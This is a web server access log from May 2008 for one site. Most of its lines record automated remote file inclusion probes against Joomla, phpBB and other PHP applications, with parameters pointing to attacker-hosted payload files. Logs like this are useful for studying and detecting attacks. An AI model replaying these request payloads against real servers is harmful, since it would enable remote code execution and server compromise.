82.100.220.35 - - [16/May/2008:10:12:42 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:12:42 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:10:12:55 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:10:12:55 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:10:12:55 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:13:00 -0700] "GET /logs/access_080309.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:13:00 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:13:01 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:10:13:09 -0700] "GET /retreat1/webcam/retreat1_00728.jpg HTTP/1.1" 200 48821 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:13:12 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:13:18 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:10:13:19 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:10:13:22 -0700] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:13:23 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:13:47 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.218 - - [16/May/2008:10:13:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.67.218 - - [16/May/2008:10:13:51 -0700] "GET /minamijewelry/html/images/dream_character_mos.jpg HTTP/1.1" 200 3143 "-" "Googlebot-Image/1.0" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:13:59 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:13:59 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:14:00 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:14:04 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:14:05 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:14:09 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:14:09 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:14:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:14:12 -0700] "GET /logs/access_080209.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:14:12 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:14:12 -0700] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:14:17 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:14:17 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:14:43 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:14:46 -0700] "GET /logs//?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:10:14:47 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:10:14:48 -0700] "GET /logs/access_080128.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:10:14:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:14:53 -0700] "GET //?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:14:59 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:15:01 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:15:17 -0700] "GET /logs/home.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:15:17 -0700] "GET /home.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:10:15:31 -0700] "GET /logs//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:10:15:32 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:15:41 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:15:41 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:15:55 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:15:55 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:15:56 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:16:09 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:16:09 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:16:09 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:16:09 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:16:10 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:16:14 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:16:15 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:16:15 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:16:19 -0700] "GET //mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:10:16:40 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:10:16:52 -0700] "GET /mobileoffice/Picture_012.jpg HTTP/1.1" 200 624334 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:10:16:59 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:10:17:00 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:17:35 -0700] "GET //mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:17:50 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:17:51 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:17:51 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:17:52 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:17:52 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:19 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:19 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:20 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:18:20 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:18:33 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:35 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:35 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:35 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:18:36 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:18:36 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:18:43 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:18:46 -0700] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:18:54 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:18:59 -0700] "GET /logs/access_080215.log//mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:18:59 -0700] "GET //mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:18:59 -0700] "GET /logs//mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:19:17 -0700] "GET /logs/access_080215.log//?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:19:22 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:19:23 -0700] "GET /logs//?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:24 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:19:24 -0700] "GET //?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:24 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:24 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:19:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:31 -0700] "GET /logs/access.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:31 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:31 -0700] "GET /logs//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:33 -0700] "GET /logs/access.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:33 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:33 -0700] "GET /logs//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:45 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:45 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:19:46 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:47 -0700] "GET /logs/access_080126.log//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:47 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:19:47 -0700] "GET /logs//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:20:00 -0700] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:20:07 -0700] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:20:12 -0700] "GET /logs/access_080110.log//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:20:13 -0700] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:20:16 -0700] "GET /menu.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:20:16 -0700] "GET /logs/menu.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.25.230.39 - - [16/May/2008:10:20:16 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [16/May/2008:10:20:17 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:10:20:18 -0700] "GET /logs/access_071226.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:10:20:18 -0700] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:20:19 -0700] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.203.73.105 - - [16/May/2008:10:20:21 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [16/May/2008:10:20:22 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:20:24 -0700] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:20:27 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
